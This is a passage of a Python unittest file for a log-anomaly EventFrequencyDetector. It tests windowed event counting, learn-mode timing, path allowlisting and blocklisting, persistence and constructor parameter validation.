"""Unittests for the EventFrequencyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new frequencies. The EFD is used with one path to be analyzed over four time windows. The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. 
""" # Initialize detector for analyzing values in one path in time windows of 10 seconds t = time.time() expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+17, None) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+18, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+19, None) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+25, None) log_atom9 = LogAtom(b"b", 
ParserMatch(MatchElement("/value", b"b", b"b", None)), t+25, None) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+35, None) efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [1]}) efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [2]}) efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3]}) efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 1]}) efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 3]}) efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4]}) efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4, 1]}) efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4, 2]}) efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [4, 2, 1]}) # target_path_list efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) # Forward log atoms to detector # Log atoms of initial window 1 should not create anomalies and add to counts # Input: a; initial time window is started # Expected output: frequency of a is 1 
efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [1]}) # Input: b; initial time window is not finished # Expected output: frequency of b is 1 added to existing count efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [1], ("b",): [1]}) # Input: a; initial time window is not finished # Expected output: frequency of a is 2 replaces a in existing count efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2], ("b",): [1]}) # Time window 2 should not create anomalies since a is in confidence (3 vs 2 occurrences) and b is identical (1 occurrence). # Input: a; initial time window is completed, second time window is started # Expected output: frequency of a is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 1], ("b",): [1, 0]}) # Input: b; second time window is not finished # Expected output: frequency of b is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 1], ("b",): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 3 in new time window count, old count remains unchanged efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 2], ("b",): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 4 in new time window count, old count remains unchanged efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3], ("b",): [1, 1]}) # Time window 3 should create 2 anomalies since a drops from 3 to 0 and b increases from 
1 to 2, which will be reported in window 4. # Anomalies are only reported when third time window is known to be completed, which will occur when subsequent atom is received. # Input: b; second time window is completed, third time window is started # Expected output: frequency of b is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3, 0], ("b",): [1, 1, 1]}) # Input: b; third time window is not finished # Expected output: frequency of b is 2 in new time window count, old count remains unchanged efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3, 0], ("b",): [1, 1, 2]}) # Time window 4 should not create anomalies since no log atom is received to evaluate it. # Input: a; third time window is completed, fourth time window is started # Expected output: Anomalies for unexpected low counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new # time window count, old count remains unchanged efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+35).strftime(dtf), efd.__class__.__name__, 1, "a") + expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), efd.__class__.__name__, 1, "b")) self.assertEqual(efd.counts, {("a",): [3, 0, 1], ("b",): [1, 2, 0]}) self.reset_output_stream() # unique_path_list efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], unique_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [1]}) efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") 
self.assertEqual(efd.counts, {("/value",): [2]}) efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3]}) efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 1]}) efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2, 1]}) efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2, 1]}) efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [2, 1, 1]}) # stop_learning_time efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(efd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(efd.receive_atom(log_atom1)) self.assertTrue(efd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(efd.receive_atom(log_atom1)) self.assertFalse(efd.learn_mode) # stop_learning_no_anomaly_time efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False, 
stop_learning_no_anomaly_time=100)
        # Reset the atom time that the stop_learning_time variant above moved to t + 102.
        log_atom1.atom_time = t
        self.assertTrue(efd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(efd.receive_atom(log_atom1))
        self.assertTrue(efd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(efd.receive_atom(log_atom2))
        self.assertTrue(efd.learn_mode)
        # 200 s after the first atom and more than 100 s since the learning deadline: learn_mode must be off.
        log_atom1.atom_time = t + 200
        self.assertTrue(efd.receive_atom(log_atom1))
        self.assertFalse(efd.learn_mode)

    def test2do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        With next_persist_time 400 s ahead, do_timer reports the remaining delay (200 s at t + 200) and, once the
        deadline is reached, returns DEFAULT_PERSISTENCE_PERIOD. The t + 999 / t + 1000 pair asserts that the deadline
        was re-armed to t + 1000 by the call at t + 400, i.e. the expected values only hold for a 600 s default period.
        """
        efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler])
        t = time.time()
        efd.next_persist_time = t + 400
        self.assertEqual(efd.do_timer(t + 200), 200)
        self.assertEqual(efd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(efd.do_timer(t + 999), 1)
        self.assertEqual(efd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """
        Test if the allowlist_event method is implemented properly.

        Allowlisted paths are appended to efd.constraint_list and the call returns a confirmation string; the
        behaviour does not depend on learn_mode.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler])
        analysis = "Analysis.%s"
        # NOTE(review): assertRaises(Exception, ...) is satisfied by any exception, including an unrelated
        # TypeError/AttributeError, so these two negative cases cannot distinguish the intended rejection from a
        # crash. Narrowing them to the exception type allowlist_event actually raises would make them meaningful.
        self.assertRaises(Exception, efd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The EventFrequencyDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, efd.allowlist_event, analysis % efd.__class__.__name__, self.output_stream.getvalue(),
                          ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(efd.allowlist_event(analysis % efd.__class__.__name__, "/s1", None),
                         "Allowlisted path %s in %s." % ("/s1", analysis % efd.__class__.__name__))
        self.assertEqual(efd.constraint_list, ["/s1"])
        # Allowlisting must keep working after learning has been switched off.
        efd.learn_mode = False
        self.assertEqual(efd.allowlist_event(analysis % efd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s."
                         % ("/d1", analysis % efd.__class__.__name__))
        self.assertEqual(efd.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """
        Test if the blocklist_event method is implemented properly.

        Mirror of test3allowlist_event: blocklisted paths are appended to efd.ignore_list and the call returns a
        confirmation string; the behaviour does not depend on learn_mode.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler])
        analysis = "Analysis.%s"
        # NOTE(review): as in test3allowlist_event, assertRaises(Exception, ...) accepts any exception type; a
        # narrower type would make these negative cases meaningful.
        self.assertRaises(Exception, efd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The EventFrequencyDetector can not handle blocklisting data and therefore an exception is expected.
        self.assertRaises(Exception, efd.blocklist_event, analysis % efd.__class__.__name__, self.output_stream.getvalue(),
                          ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(efd.blocklist_event(analysis % efd.__class__.__name__, "/s1", None),
                         "Blocklisted path %s in %s." % ("/s1", analysis % efd.__class__.__name__))
        self.assertEqual(efd.ignore_list, ["/s1"])
        # Blocklisting must keep working after learning has been switched off.
        efd.learn_mode = False
        self.assertEqual(efd.blocklist_event(analysis % efd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s."
                         % ("/d1", analysis % efd.__class__.__name__))
        self.assertEqual(efd.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        The detector is created with the default window_size, so all ten atoms (t + 1 .. t + 35) fall into one
        open window and efd.counts is [10] after feeding them. The "Start of window N" comments below are carried
        over from test1receive_atom and do not describe window boundaries for this configuration.
        The persisted document is plain text (the asserted string is JSON-like with a "string:" prefix on the
        path key); only completed windows are written, which is why the persisted count list is empty and
        reloading yields a fresh [0].
        """
        t = time.time()
        efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=True, learn_mode=True)
        log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, None)
        log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, None)
        log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, None)
        # Start of window 2:
        log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, None)
        log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, None)
        log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, None)
        log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, None)
        # Start of window 3:
        log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None)
        log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None)
        # Start of window 4:
        log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, None)
        efd.receive_atom(log_atom1)
        efd.receive_atom(log_atom2)
        efd.receive_atom(log_atom3)
        efd.receive_atom(log_atom4)
        efd.receive_atom(log_atom5)
        efd.receive_atom(log_atom6)
        efd.receive_atom(log_atom7)
        efd.receive_atom(log_atom8)
        efd.receive_atom(log_atom9)
        efd.receive_atom(log_atom10)
        efd.do_persist()
        # Pin the exact on-disk representation so that a change of the persistence format is caught here.
        with open(efd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[[["string:/value"], [], []]]')
        # The in-memory state is not touched by do_persist.
        self.assertEqual(efd.counts, {("/value",): [10]})
        self.assertEqual(efd.scoring_value_list, {})
        efd.counts = {}
        efd.load_persistence_data()
        self.assertEqual(efd.counts, {("/value",): [0]})
        # A second detector with the same (default) persistence_id must load the identical state on construction.
        other = EventFrequencyDetector(self.aminer_config,
[self.stream_printer_event_handler], empty_window_warnings=True, learn_mode=True) self.assertEqual(other.counts, efd.counts) self.assertEqual(other.scoring_value_list, efd.scoring_value_list) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, "") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, 
EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 
scoring_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], unique_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], unique_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size="123") self.assertRaises(TypeError, 
EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=0.5) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=100.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=()) 
self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], num_windows=100) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1.1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0.5) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 
[self.stream_printer_event_handler], empty_window_warnings="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 
[self.stream_printer_event_handler], early_exceeding_anomaly_output=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=True) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=-1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=0) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=10.12) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, 
[self.stream_printer_event_handler], set_upper_limit=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=0) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=11, set_upper_limit=10) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=10.12) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 
